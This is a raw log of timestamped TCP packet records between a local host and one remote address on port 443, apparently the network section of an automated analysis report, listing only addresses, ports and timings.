Nov 26, 2024 08:12:32.879225016 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:32.879514933 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:32.881007910 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:32.923340082 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.378230095 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.378432035 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.378514051 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.378735065 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.378755093 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.378767014 CET	49767	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.378772974 CET	443	49767	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.380261898 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.380309105 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:33.380594969 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.380970955 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:33.380989075 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:34.802134991 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:34.802777052 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:34.802825928 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:34.803877115 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:34.803885937 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.436413050 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.436486959 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.436563969 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.436594009 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.439941883 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.440012932 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.514957905 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.515003920 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.515022993 CET	49773	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.515031099 CET	443	49773	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.763251066 CET	49779	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.763288021 CET	443	49779	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.763402939 CET	49779	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.763900042 CET	49779	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.763942003 CET	443	49779	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.764030933 CET	49779	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.778203964 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.778254986 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:35.778331041 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.779098034 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:35.779114008 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.141568899 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.141813040 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.143095016 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.143105030 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.143373013 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.144628048 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.187354088 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.642726898 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.642796993 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.642857075 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.643098116 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.643116951 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.643131018 CET	49780	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.643138885 CET	443	49780	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.644383907 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.644416094 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:37.644484043 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.644711018 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:37.644726992 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.019750118 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.020661116 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.020680904 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.022335052 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.022340059 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.646608114 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.646675110 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.646822929 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.646838903 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.650223017 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.650316000 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.650374889 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.650374889 CET	49786	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.650392056 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.650399923 CET	443	49786	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.920716047 CET	49792	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.920766115 CET	443	49792	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.920897961 CET	49792	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.921036005 CET	49792	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.921109915 CET	443	49792	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.921200991 CET	49792	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.933082104 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.933139086 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:39.933242083 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.933574915 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:39.933588028 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.309418917 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.309551954 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.310905933 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.310916901 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.311249018 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.312747002 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.355334997 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.811013937 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.811080933 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.811182976 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.811414957 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.811430931 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.811440945 CET	49793	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.811445951 CET	443	49793	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.813004017 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.813035965 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:41.813117981 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.813299894 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:41.813309908 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.142512083 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.143202066 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.143230915 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.144088030 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.144097090 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.759939909 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.759987116 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.760082006 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.760097980 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.766221046 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.766308069 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.825450897 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.825479031 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:43.825493097 CET	49799	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:43.825500965 CET	443	49799	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:44.209312916 CET	49805	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.209343910 CET	443	49805	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:44.209455967 CET	49805	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.440221071 CET	49805	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.440291882 CET	443	49805	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:44.440342903 CET	49805	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.474493980 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.474539995 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:44.474606991 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.478454113 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:44.478481054 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:45.806610107 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:45.806689024 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:45.807965040 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:45.807975054 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:45.809075117 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:45.810291052 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:45.855330944 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.299165010 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.299685001 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.299767971 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.299855947 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.299875975 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.299890041 CET	49806	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.299896002 CET	443	49806	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.300749063 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.300791025 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:46.300865889 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.301095963 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:46.301109076 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:47.720370054 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:47.762698889 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:47.840039015 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:47.840053082 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:47.882431984 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:47.882437944 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467525005 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467655897 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467664957 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467710018 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.467727900 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467757940 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.467962027 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.467971087 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.467991114 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.468100071 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.468137980 CET	443	49812	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.468487978 CET	49812	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.705558062 CET	49818	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.705600977 CET	443	49818	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.705673933 CET	49818	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.705749989 CET	49818	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.705809116 CET	443	49818	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.706115961 CET	49818	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.774928093 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.774976015 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:48.775074959 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.775372982 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:48.775388002 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.115658998 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.115789890 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.117064953 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.117073059 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.117317915 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.122734070 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.167325974 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.819840908 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.819910049 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.820080042 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.820425987 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.820425987 CET	49819	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.820444107 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.820455074 CET	443	49819	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.821381092 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.821424007 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:50.821510077 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.821727037 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:50.821742058 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.205524921 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.206223965 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.206259012 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.207079887 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.207087040 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.832284927 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.840734005 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.840843916 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.840857029 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.841559887 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.841620922 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.876574039 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.876590967 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:52.876600981 CET	49825	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:52.876611948 CET	443	49825	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:53.101288080 CET	49831	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.101331949 CET	443	49831	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:53.101433992 CET	49831	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.496150017 CET	49831	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.496251106 CET	443	49831	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:53.496568918 CET	49831	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.535106897 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.535168886 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:53.535248995 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.535953999 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:53.535969019 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:54.864140034 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:54.864294052 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:54.865550041 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:54.865561962 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:54.865863085 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:54.867141962 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:54.911328077 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.356556892 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.356630087 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.356709003 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.356961966 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.356981039 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.356991053 CET	49832	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.356997013 CET	443	49832	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.358099937 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.358143091 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:55.358217001 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.358398914 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:55.358411074 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:56.731515884 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:56.779735088 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:56.867548943 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:56.867556095 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:56.868511915 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:56.868515968 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.375273943 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.375355005 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.375366926 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.375430107 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.375461102 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.378597021 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.378681898 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.384155989 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.384212017 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.384236097 CET	49838	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.384248018 CET	443	49838	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.609846115 CET	49844	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.609895945 CET	443	49844	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.610027075 CET	49844	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.610161066 CET	49844	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.610260963 CET	443	49844	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.610380888 CET	49844	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.673552990 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.673602104 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:57.673715115 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.674515963 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:57.674530029 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.050827026 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.051285982 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.052345991 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.052355051 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.052704096 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.053970098 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.099333048 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.551330090 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.551523924 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.551578045 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.551846027 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.551858902 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.551870108 CET	49845	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.551876068 CET	443	49845	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.552896976 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.552938938 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:12:59.553004980 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.553220987 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:12:59.553231955 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:00.972803116 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:00.973325968 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:00.973349094 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:00.974258900 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:00.974266052 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.606024981 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.606091022 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.606178999 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.606189013 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.609652996 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.609733105 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.612709999 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.612719059 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.612742901 CET	49850	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.612749100 CET	443	49850	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.875370026 CET	49855	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.875415087 CET	443	49855	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.875504017 CET	49855	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.946290016 CET	49855	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:01.946978092 CET	443	49855	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:01.947031021 CET	49855	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:02.442192078 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:02.442255974 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:02.442317009 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:02.474917889 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:02.474960089 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:03.808653116 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:03.808752060 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:03.809961081 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:03.809968948 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:03.810285091 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:03.811486959 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:03.859322071 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.300343990 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.300515890 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.300709963 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.300940990 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.300960064 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.300971985 CET	49858	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.300978899 CET	443	49858	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.301970959 CET	49862	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.301997900 CET	443	49862	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:04.302083969 CET	49862	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.302299976 CET	49862	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:04.302328110 CET	443	49862	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:05.680752039 CET	443	49862	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:05.681334972 CET	49862	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:13:05.681366920 CET	443	49862	108.170.55.202	192.168.2.7
Nov 26, 2024 08:13:05.682219982 CET	49862	443	192.168.2.7	108.170.55.202
